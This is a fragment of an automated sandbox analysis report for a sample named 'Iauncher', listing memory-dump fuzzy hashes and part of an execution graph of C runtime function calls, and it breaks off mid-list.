                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: de7958f5c5b95f708c75905b9be9dcd979442eeaed5d2393557ca78a2a3e3dbd
                                                                                                                                                                              • Instruction ID: 8577309fbe1c86c063ac1564dadbcc998df664ffb8be4f6423f30822e613e500
                                                                                                                                                                              • Opcode Fuzzy Hash: de7958f5c5b95f708c75905b9be9dcd979442eeaed5d2393557ca78a2a3e3dbd
                                                                                                                                                                              • Instruction Fuzzy Hash: 79C02B502583C093C144D3184480729DEE09FB1300FC0CCAEE58946101C050C812D732
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: pbq
                                                                                                                                                                              • API String ID: 0-3896149868
                                                                                                                                                                              • Opcode ID: 46c1c370610e61ce7712ecdb2fc9944ca0b0635ec8fe12ddaccb0b4455a6eb01
                                                                                                                                                                              • Instruction ID: 6dafe86bc34bd9c9765617e2f21dbec90ecdb508dcd8edca0f14c5e8d3d2f520
                                                                                                                                                                              • Opcode Fuzzy Hash: 46c1c370610e61ce7712ecdb2fc9944ca0b0635ec8fe12ddaccb0b4455a6eb01
                                                                                                                                                                              • Instruction Fuzzy Hash: 4F02E375A00218DFDB15CFA9C984E99BBB2FF49304F1581A9E609AB332D731E991DF40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: pbq
                                                                                                                                                                              • API String ID: 0-3896149868
                                                                                                                                                                              • Opcode ID: d05382769f81f0451c9996a7edc51df37b50750d2d8aaff2ab84ba332a0ceb16
                                                                                                                                                                              • Instruction ID: baf2f8ce2f3fd356000ccca45be20026b35f0ee7c6b5edb26669080e017d93c0
                                                                                                                                                                              • Opcode Fuzzy Hash: d05382769f81f0451c9996a7edc51df37b50750d2d8aaff2ab84ba332a0ceb16
                                                                                                                                                                              • Instruction Fuzzy Hash: 1202DF75A00218DFDB15CFA9C984E99BBB2FF49304F1591A9E509AB372DB31E891DF00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e2bb975556bce8aa3c26d54647bca61196034ce3577d63b7042647441aff3425
                                                                                                                                                                              • Instruction ID: 58fe17de4a0aa6b42a1eab568fa5160ecba577ec9ac008a3c2b1b03826e6fee7
                                                                                                                                                                              • Opcode Fuzzy Hash: e2bb975556bce8aa3c26d54647bca61196034ce3577d63b7042647441aff3425
                                                                                                                                                                              • Instruction Fuzzy Hash: B192C335910229DFCB21EF64C888ADDBBB5FF89300F0592E9E509A7260DB719AD5DF40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0cccfb292b539ee9f9b9aeca5047a5ec043cefd89bba048e51253199a746d199
                                                                                                                                                                              • Instruction ID: fb1fef86815f07773f2a5d495bedc68960181d90c3a31604ad67072e4337542d
                                                                                                                                                                              • Opcode Fuzzy Hash: 0cccfb292b539ee9f9b9aeca5047a5ec043cefd89bba048e51253199a746d199
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F027F75D012698FDB60DFA9C880BDDBBF1BF49300F1081AAE948B7250EB709A85DF50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0dc10585d04a28db000fd99560845d2c2cecf7fab03b540325b293b83afbb639
                                                                                                                                                                              • Instruction ID: 3c4e005db0c20e4264aaf866df1ccbc1903b7c8d726d9d9e39843360aaedae87
                                                                                                                                                                              • Opcode Fuzzy Hash: 0dc10585d04a28db000fd99560845d2c2cecf7fab03b540325b293b83afbb639
                                                                                                                                                                              • Instruction Fuzzy Hash: EE1297B2C8AB468BD390CF66E88C1893BB1B745318FD1CA09D3665B2E5D7B4116ACF44
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: caefc4de42c0a0ae5ab8385703f15e1f787b4477d1e0d554b1ae5aecd0fc0f1a
                                                                                                                                                                              • Instruction ID: b8f0c0507d1f5c6e28ec6ae2496cf43bce0672460ffba3d9bde2c503d0367f09
                                                                                                                                                                              • Opcode Fuzzy Hash: caefc4de42c0a0ae5ab8385703f15e1f787b4477d1e0d554b1ae5aecd0fc0f1a
                                                                                                                                                                              • Instruction Fuzzy Hash: F4F19F75D01269CFDB60DFA9C880BDDBBB5BF59300F1085AAE908B7250EB709A85CF50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: bbb349dd93a1fe1a60bdb9ca02d566c1f5b469f924a669c39f038f8af3e7eece
                                                                                                                                                                              • Instruction ID: 7420dcf52994fc0eef8f6e008c696da14836c8c84dab8d97e8dd7d192f63c470
                                                                                                                                                                              • Opcode Fuzzy Hash: bbb349dd93a1fe1a60bdb9ca02d566c1f5b469f924a669c39f038f8af3e7eece
                                                                                                                                                                              • Instruction Fuzzy Hash: 40A18E32E002098FCF15DFB4D8845AEB7B2FF85305B15956AE815AF2A1EB31E995CF40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4138968cee714a9a6ed1926b5d3f4e42249c424d7336b3d35b2a68975c2f23dc
                                                                                                                                                                              • Instruction ID: 1a0335f30365eb683cb4967b95a781f4c87f52013a3f5d6a0af7b0fae6897409
                                                                                                                                                                              • Opcode Fuzzy Hash: 4138968cee714a9a6ed1926b5d3f4e42249c424d7336b3d35b2a68975c2f23dc
                                                                                                                                                                              • Instruction Fuzzy Hash: 8AC12EB1C8AB468BD790CF66E88C1897BB1FB85314F91CB09D3616B2D1DBB41466CF44
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 8f15e21b3ee03f450489a99a002b9d7b02427463255c7eb30d1037edd9296b63
                                                                                                                                                                              • Instruction ID: f8a31680908e5f3860b762031f9bee94b4b1cc2692f7593d42268edf17816e57
                                                                                                                                                                              • Opcode Fuzzy Hash: 8f15e21b3ee03f450489a99a002b9d7b02427463255c7eb30d1037edd9296b63
                                                                                                                                                                              • Instruction Fuzzy Hash: 51C12FB1C9AB468BD790CF26E88C1897BB1BB85314F91CB09D3616F2D1DBB4146ACF44
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5c20f762f30144abfec92d56ecf82250cc74f295af3a3902fe137639ac4f0c74
                                                                                                                                                                              • Instruction ID: fba6a2f4c928f8dfef245c510d3569a8522005c10a11c9e4013c6445d4cd22a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 5c20f762f30144abfec92d56ecf82250cc74f295af3a3902fe137639ac4f0c74
                                                                                                                                                                              • Instruction Fuzzy Hash: 1051D675E012188FDB18CFAAD9406DDBBF2FF89304F14D16AD518AB264EB30A985DF50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: d8f6023fe93d7b2444200ae053dcd87ff1040f3635ab80e802ebdea732dc89c4
                                                                                                                                                                              • Instruction ID: 559416cd55cd19bab6f8d56fb4ad85ca782e2065cc0ac79df105c2e0f650a295
                                                                                                                                                                              • Opcode Fuzzy Hash: d8f6023fe93d7b2444200ae053dcd87ff1040f3635ab80e802ebdea732dc89c4
                                                                                                                                                                              • Instruction Fuzzy Hash: 2951C675E052188FDB18CFAAD940ADDFBF6BF89300F14D1AAD509AB265EB309945CF40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a129d05cd3cbb160c6c1e1cc2e67844a31cbe9d4ea582dd02840ebca4d7675dd
                                                                                                                                                                              • Instruction ID: 61bf49332a7c23f6f9d02b1fc21b34db8adbca5947d0246a1755b575c83c9b9f
                                                                                                                                                                              • Opcode Fuzzy Hash: a129d05cd3cbb160c6c1e1cc2e67844a31cbe9d4ea582dd02840ebca4d7675dd
                                                                                                                                                                              • Instruction Fuzzy Hash: 6751C775E01218CFEB14CF6AD940BD9BBF2AF99304F04D1B9D508AB264EB309A85CF51
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: dbb7bba7151710abdda05d09e191384f415e0f543dd4b523bd2beb4ad039f9a9
                                                                                                                                                                              • Instruction ID: 9c941de4d7a4a72c8dd798eb2280a555f4307e40ca6ebbb034497b6b8ad666b0
                                                                                                                                                                              • Opcode Fuzzy Hash: dbb7bba7151710abdda05d09e191384f415e0f543dd4b523bd2beb4ad039f9a9
                                                                                                                                                                              • Instruction Fuzzy Hash: 86411670E002198FDB04DFA8D594BEEBBF1FB89301F118469E815B7291C778EA45CBA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6ffecf775c02444b2a1b88b450b938d32ae11c0f4c4f43ca369a09b34a7c7eee
                                                                                                                                                                              • Instruction ID: bd167458fe47c5a72622cc7253a7061236411037f3d8fe80fe98b6f70bf5905c
                                                                                                                                                                              • Opcode Fuzzy Hash: 6ffecf775c02444b2a1b88b450b938d32ae11c0f4c4f43ca369a09b34a7c7eee
                                                                                                                                                                              • Instruction Fuzzy Hash: E5310774E002198FDB04DFA8D584BEEBBF1FB49301F119469E911B7290C778DA45CBA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f90e2d9875cd378024367dcdb4a51512aedccac5887dd50e2db6dffa25991222
                                                                                                                                                                              • Instruction ID: 99daf1e3b60c7ad5653d3a9afe01e488671b28abb429f1903f63efc946b1b979
                                                                                                                                                                              • Opcode Fuzzy Hash: f90e2d9875cd378024367dcdb4a51512aedccac5887dd50e2db6dffa25991222
                                                                                                                                                                              • Instruction Fuzzy Hash: 07F096B1F002089FD740DFA8D840ADEFBF8EB4A324F1055A5D908E7351D675ED418B61
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:3.9%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:0.4%
                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                              Total number of Limit Nodes:50
                                                                                                                                                                              execution_graph 19054 f110f0 19057 f1682c 19054->19057 19060 f167ff 19057->19060 19061 f16815 19060->19061 19062 f1680e 19060->19062 19069 f22a7d 19061->19069 19066 f22a00 19062->19066 19065 f110f5 19067 f22a7d 44 API calls 19066->19067 19068 f22a12 19067->19068 19068->19065 19072 f227c9 19069->19072 19073 f227d5 __FrameHandler3::FrameUnwindToState 19072->19073 19080 f1d9e4 EnterCriticalSection 19073->19080 19075 f227e3 19081 f22824 19075->19081 19077 f227f0 19091 f22818 19077->19091 19080->19075 19082 f2283f 19081->19082 19083 f228b2 __dosmaperr 19081->19083 19082->19083 19084 f22892 19082->19084 19094 f2cd1b 19082->19094 19083->19077 19084->19083 19086 f2cd1b 44 API calls 19084->19086 19088 f228a8 19086->19088 19087 f22888 19089 f24396 ___free_lconv_mon 14 API calls 19087->19089 19090 f24396 ___free_lconv_mon 14 API calls 19088->19090 19089->19084 19090->19083 19122 f1da2c LeaveCriticalSection 19091->19122 19093 f22801 19093->19065 19095 f2cd43 19094->19095 19096 f2cd28 19094->19096 19098 f2cd52 19095->19098 19103 f3044f 19095->19103 19096->19095 19097 f2cd34 19096->19097 19100 f1e2e0 __Wcrtomb 14 API calls 19097->19100 19110 f28bb7 19098->19110 19102 f2cd39 codecvt 19100->19102 19102->19087 19104 f3045a 19103->19104 19105 f3046f HeapSize 19103->19105 19106 f1e2e0 __Wcrtomb 14 API calls 19104->19106 19105->19098 19107 f3045f 19106->19107 19108 f1accf __strnicoll 41 API calls 19107->19108 19109 f3046a 19108->19109 19109->19098 19111 f28bc4 19110->19111 19112 f28bcf 19110->19112 19113 f245c0 std::_Locinfo::_Locinfo_ctor 15 API calls 19111->19113 19114 f28bd7 19112->19114 19120 f28be0 __dosmaperr 19112->19120 19119 f28bcc 19113->19119 19117 f24396 ___free_lconv_mon 14 API calls 19114->19117 19115 f28be5 19118 f1e2e0 __Wcrtomb 14 API calls 19115->19118 19116 f28c0a HeapReAlloc 19116->19119 19116->19120 19117->19119 19118->19119 19119->19102 19120->19115 19120->19116 19121 f203b0 codecvt 2 API calls 19120->19121 19121->19120 19122->19093 20808 f153e1 20809 f15434 20808->20809 20810 f153e8 20808->20810 20813 f1e417 EnterCriticalSection 20810->20813 20812 f153ed 20813->20812 19209 f13ae9 19210 f13b1c 19209->19210 19217 f1423e 19210->19217 19215 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19216 f13b53 19215->19216 19252 f14210 19217->19252 19220 f12dd1 19221 f12e03 19220->19221 19222 f11d84 73 API calls 19221->19222 19223 f12e59 std::ios_base::_Ios_base_dtor 19222->19223 19224 f11fa0 43 API calls 19223->19224 19225 f12e71 19224->19225 19226 f11e76 75 API calls 19225->19226 19239 f12ea9 std::ios_base::_Ios_base_dtor 19226->19239 19227 f12f24 19228 f12f60 19227->19228 19229 f13008 19227->19229 19231 f12f67 19228->19231 19232 f12fb6 19228->19232 19230 f131e2 70 API calls 19229->19230 19234 f12fb1 19230->19234 19235 f13217 70 API calls 19231->19235 19233 f131e2 70 API calls 19232->19233 19237 f12fd9 19233->19237 19241 f131e2 70 API calls 19234->19241 19236 f12f7f 19235->19236 19238 f131e2 70 API calls 19236->19238 19240 f13217 70 API calls 19237->19240 19238->19234 19239->19227 19242 f13fa3 43 API calls 19239->19242 19240->19234 19243 f13068 19241->19243 19242->19239 19244 f13217 70 API calls 19243->19244 19245 f13098 19244->19245 19246 f13359 std::ios_base::_Init 41 API calls 19245->19246 19247 f130a4 19246->19247 19248 f1337f 41 API calls 19247->19248 19249 f130ad 19248->19249 19250 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19249->19250 19251 f130be 19250->19251 19251->19215 19253 f14227 _swprintf 19252->19253 19256 f1d45f 19253->19256 19257 f1d473 _Fputc 19256->19257 19262 f1bad1 19257->19262 19260 f1aa0b _Fputc 41 API calls 19261 f13b2b 19260->19261 19261->19220 19263 f1bb00 19262->19263 19264 f1badd 19262->19264 19268 f1bb27 19263->19268 19270 f1b95d 19263->19270 19265 f1ac52 _Deallocate 29 API calls 19264->19265 19269 f1baf8 19265->19269 19267 f1ac52 _Deallocate 29 API calls 19267->19269 19268->19267 19268->19269 19269->19260 19271 f1b989 19270->19271 19272 f1b9ac 19270->19272 19273 f1ac52 _Deallocate 29 API calls 19271->19273 19272->19271 19275 f1b9b4 _swprintf 19272->19275 19280 f1b9a1 19273->19280 19274 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19276 f1bacf 19274->19276 19281 f1c806 19275->19281 19276->19268 19280->19274 19298 f1d3c7 19281->19298 19283 f1c82d 19285 f1ac52 _Deallocate 29 API calls 19283->19285 19284 f1ba35 19295 f1c657 19284->19295 19285->19284 19288 f1c81f _swprintf 19288->19283 19288->19284 19289 f1b7f0 _Fputc 41 API calls 19288->19289 19291 f1ca6e 19288->19291 19302 f1c78e 19288->19302 19305 f1cae6 19288->19305 19339 f1cc44 19288->19339 19289->19288 19292 f1ac52 _Deallocate 29 API calls 19291->19292 19293 f1ca8a 19292->19293 19294 f1ac52 _Deallocate 29 API calls 19293->19294 19294->19284 19296 f24396 ___free_lconv_mon 14 API calls 19295->19296 19297 f1c667 19296->19297 19297->19280 19299 f1d3eb 19298->19299 19300 f1d3d2 19298->19300 19299->19288 19301 f1ac52 _Deallocate 29 API calls 19300->19301 19301->19299 19368 f1bc3a 19302->19368 19304 f1c7c9 19304->19288 19306 f1cb04 19305->19306 19307 f1caed 19305->19307 19310 f1ac52 _Deallocate 29 API calls 19306->19310 19327 f1cb43 19306->19327 19308 f1cc6b 19307->19308 19309 f1ccdc 19307->19309 19307->19327 19316 f1cc71 19308->19316 19317 f1cd09 19308->19317 19311 f1cce1 19309->19311 19315 f1cd2f 19309->19315 19312 f1cb38 19310->19312 19313 f1cd23 19311->19313 19314 f1cce3 19311->19314 19312->19288 19427 f1d340 19313->19427 19319 f1cc85 19314->19319 19320 f1cce8 19314->19320 19315->19317 19321 f1ccae 19315->19321 19337 f1cc93 _swprintf 19315->19337 19316->19321 19326 f1cc77 19316->19326 19410 f1bfe4 19317->19410 19319->19337 19338 f1cca7 _swprintf 19319->19338 19417 f1d080 19319->19417 19320->19317 19325 f1cced 19320->19325 19321->19338 19391 f1c161 19321->19391 19324 f1ccc3 19324->19338 19398 f1d20a 19324->19398 19329 f1cd00 19325->19329 19330 f1ccf2 19325->19330 19326->19319 19326->19324 19326->19337 19327->19288 19406 f1d29f 19329->19406 19330->19338 19402 f1d323 19330->19402 19332 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19335 f1cfd0 19332->19335 19335->19288 19336 f25158 _Fputc 43 API calls 19336->19337 19337->19336 19337->19338 19338->19332 19340 f1cc6b 19339->19340 19341 f1ccdc 19339->19341 19346 f1cc71 19340->19346 19347 f1cd09 19340->19347 19342 f1cce1 19341->19342 19345 f1cd2f 19341->19345 19343 f1cd23 19342->19343 19344 f1cce3 19342->19344 19350 f1d340 _swprintf 30 API calls 19343->19350 19348 f1cc85 19344->19348 19349 f1cce8 19344->19349 19345->19347 19351 f1ccae 19345->19351 19366 f1cc93 _swprintf 19345->19366 19346->19351 19356 f1cc77 19346->19356 19352 f1bfe4 _swprintf 30 API calls 19347->19352 19353 f1d080 _swprintf 44 API calls 19348->19353 19348->19366 19367 f1cca7 _swprintf 19348->19367 19349->19347 19354 f1cced 19349->19354 19350->19366 19359 f1c161 _swprintf 30 API calls 19351->19359 19351->19367 19352->19366 19353->19366 19357 f1cd00 19354->19357 19358 f1ccf2 19354->19358 19355 f1ccc3 19362 f1d20a _swprintf 43 API calls 19355->19362 19355->19367 19356->19348 19356->19355 19356->19366 19361 f1d29f _swprintf 29 API calls 19357->19361 19363 f1d323 _swprintf 30 API calls 19358->19363 19358->19367 19359->19366 19360 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19364 f1cfd0 19360->19364 19361->19366 19362->19366 19363->19366 19364->19288 19365 f25158 _Fputc 43 API calls 19365->19366 19366->19365 19366->19367 19367->19360 19378 f1b84b 19368->19378 19370 f1bc61 19372 f1ac52 _Deallocate 29 API calls 19370->19372 19371 f1bc4c 19371->19370 19374 f1bc94 19371->19374 19377 f1bc7c _swprintf 19371->19377 19372->19377 19373 f1bd2b 19375 f1b797 _swprintf 41 API calls 19373->19375 19374->19373 19385 f1b797 19374->19385 19375->19377 19377->19304 19379 f1b850 19378->19379 19380 f1b863 19378->19380 19381 f1e2e0 __Wcrtomb 14 API calls 19379->19381 19380->19371 19382 f1b855 19381->19382 19383 f1accf __strnicoll 41 API calls 19382->19383 19384 f1b860 19383->19384 19384->19371 19386 f1b7a8 19385->19386 19387 f1b7bc 19385->19387 19386->19387 19388 f1e2e0 __Wcrtomb 14 API calls 19386->19388 19387->19373 19389 f1b7b1 19388->19389 19390 f1accf __strnicoll 41 API calls 19389->19390 19390->19387 19392 f1c175 _swprintf 19391->19392 19393 f1c197 19392->19393 19395 f1c1be 19392->19395 19394 f1ac52 _Deallocate 29 API calls 19393->19394 19396 f1c1b4 _swprintf 19394->19396 19395->19396 19430 f1bb88 19395->19430 19396->19337 19399 f1d225 _swprintf 19398->19399 19400 f1d25c 19399->19400 19401 f25158 _Fputc 43 API calls 19399->19401 19400->19337 19401->19400 19403 f1d32f 19402->19403 19444 f1be67 19403->19444 19405 f1d33f 19405->19337 19409 f1d2b4 _swprintf 19406->19409 19407 f1ac52 _Deallocate 29 API calls 19408 f1d2d5 19407->19408 19408->19337 19409->19407 19409->19408 19412 f1bff8 _swprintf 19410->19412 19411 f1c041 19415 f1bb88 _swprintf 15 API calls 19411->19415 19416 f1c037 _swprintf 19411->19416 19412->19411 19413 f1c01a 19412->19413 19414 f1ac52 _Deallocate 29 API calls 19413->19414 19414->19416 19415->19416 19416->19337 19418 f1d09a 19417->19418 19419 f1bb88 _swprintf 15 API calls 19418->19419 19420 f1d0db _swprintf 19419->19420 19451 f24fd7 19420->19451 19423 f1b7f0 _Fputc 41 API calls 19424 f1d189 _swprintf 19423->19424 19425 f1b7f0 _Fputc 41 API calls 19424->19425 19426 f1d1bc _swprintf 19424->19426 19425->19426 19426->19337 19426->19426 19428 f1c161 _swprintf 30 API calls 19427->19428 19429 f1d355 19428->19429 19429->19337 19431 f1bbaf 19430->19431 19438 f1bb9d 19430->19438 19432 f245c0 std::_Locinfo::_Locinfo_ctor 15 API calls 19431->19432 19431->19438 19433 f1bbd3 19432->19433 19434 f1bbe6 19433->19434 19435 f1bbdb 19433->19435 19441 f1c671 19434->19441 19436 f24396 ___free_lconv_mon 14 API calls 19435->19436 19436->19438 19438->19396 19440 f24396 ___free_lconv_mon 14 API calls 19440->19438 19442 f24396 ___free_lconv_mon 14 API calls 19441->19442 19443 f1bbf1 19442->19443 19443->19440 19445 f1be7b _swprintf 19444->19445 19446 f1bec4 19445->19446 19447 f1be9d 19445->19447 19449 f1bb88 _swprintf 15 API calls 19446->19449 19450 f1beba _swprintf 19446->19450 19448 f1ac52 _Deallocate 29 API calls 19447->19448 19448->19450 19449->19450 19450->19405 19452 f2500c 19451->19452 19454 f24fe8 19451->19454 19452->19454 19455 f2503f _swprintf 19452->19455 19453 f1ac52 _Deallocate 29 API calls 19467 f1d165 19453->19467 19454->19453 19456 f25078 19455->19456 19458 f250a7 19455->19458 19470 f24e7b 19456->19470 19457 f250d5 19478 f24713 19457->19478 19458->19457 19461 f250d0 19458->19461 19459 f25137 19505 f24a3f 19459->19505 19460 f250fd 19464 f25102 19460->19464 19465 f2511d 19460->19465 19461->19459 19461->19460 19488 f24dac 19464->19488 19498 f24c28 19465->19498 19467->19423 19467->19424 19471 f24e91 19470->19471 19472 